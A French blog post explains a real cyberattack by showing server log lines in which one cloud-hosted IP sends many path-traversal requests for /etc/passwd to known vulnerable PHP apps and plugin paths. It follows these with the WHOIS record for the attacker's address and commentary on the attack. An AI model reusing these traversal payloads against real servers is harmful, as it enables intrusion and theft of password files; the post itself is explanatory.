A quoi ressemble une cyberattaque dans la réalité (et pas comme au cinéma où une jolie tête de mort apparaît sur l’écran d’un ordinateur) ?
Et bien à ça :
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] « GET /KikChat/private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 500 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] « GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 492 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] « GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 554 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] « GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 550 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0 » 404 490 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /?module=../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 505 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 497 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] « GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0 » 404 505 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] « GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0 » 404 497 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] « GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0 » 404 523 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] « GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0 » 404 502 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] « GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] « GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0 » 404 494 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] « GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] « GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 496 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] « GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 487 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] « GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] « GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] « GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0 » 404 493 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] « GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0 » 404 501 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] « GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0 » 404 495 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0 » 404 495 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0 » 200 1848 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 498 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 531 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 528 « – » « – »
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] « GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 » 404 520 « – » « -«
Les traces réelles d’une cyberattaque…
Joli, non ?
La toute petite taille de caractère permet d’avoir une vue d’ensemble. Les non informaticiens n’en verraient pas plus en plus gros. Les autres sauront comment accéder à une présentation plus lisible.
L’attaque (85 tentatives en 24 secondes à 23:17 hier soir) cherche à exploiter des failles de sécurité pour récupérer le fichier qui contient les mots de passe du serveur. Ils y sont sous leur forme cryptée mais ce fichier récupéré pourrait être confortablement soumis à un traitement de décodage intensif et donner ainsi un accès pratique au serveur visé par l’attaque.
L’attaquant est identifié par 107.23.240.63, son adresse IP. On obtient facilement une description plus complète à son sujet :
NetRange: 107.20.0.0 – 107.23.255.255
CIDR: 107.20.0.0/14
OriginAS:
NetName: AMAZON-EC2-8
NetHandle: NET-107-20-0-0-1
Parent: NET-107-0-0-0-0
NetType: Direct Assignment
Comment: The activity you have detected originates from a dynamic hosting environment.
Comment: For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse
Comment: For more information regarding EC2 see:
Comment: http://ec2.amazonaws.com/
Comment: All reports MUST include:
Comment: * src IP
Comment: * dest IP (your IP)
Comment: * dest port
Comment: * Accurate date/timestamp and timezone of activity
Comment: * Intensity/frequency (short log extracts)
Comment: * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
RegDate: 2011-05-03
Updated: 2012-03-02
Ref: http://whois.arin.net/rest/net/NET-107-20-0-0-1OrgName: Amazon.com, Inc.
OrgId: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
Address: 1200 12th Avenue South
City: Seattle
StateProv: WA
PostalCode: 98144
Country: US
RegDate: 2005-09-29
Updated: 2009-06-02
Comment: For details of this service please see
Comment: http://ec2.amazonaws.com/
Ref: http://whois.arin.net/rest/org/AMAZO-4
L’attaque est donc menée depuis un serveur virtuel proposé à location à n’importe qui sur le « Cloud » par une compagnie américaine installée à Seattle. La description fournit même des indications sur la procédure à utiliser pour dénoncer les abus, à condition de révéler les détails de son identité, évidemment !
L’attaque, sans doute menée en parallèle sur des milliers d’autres ordinateurs, a certainement abouti quelque part et fourni par exemple aux cyber-pirates un nouveaux serveur pour lancer d’autres attaques. C’est une activité très répandue de nos jours et facilement praticable en toute impunité.
Et le « L7 » ?
« L7 » signifie ici « level 7 » (niveau 7) et fait référence à la plus haute couche du modèle ISO 7498. Ce modèle abstrait désigne une classifications par ailleurs complètement inutile mais en l’occurrence, une « cyberattaque de niveau 7 » fait tout de suite beaucoup plus sérieux.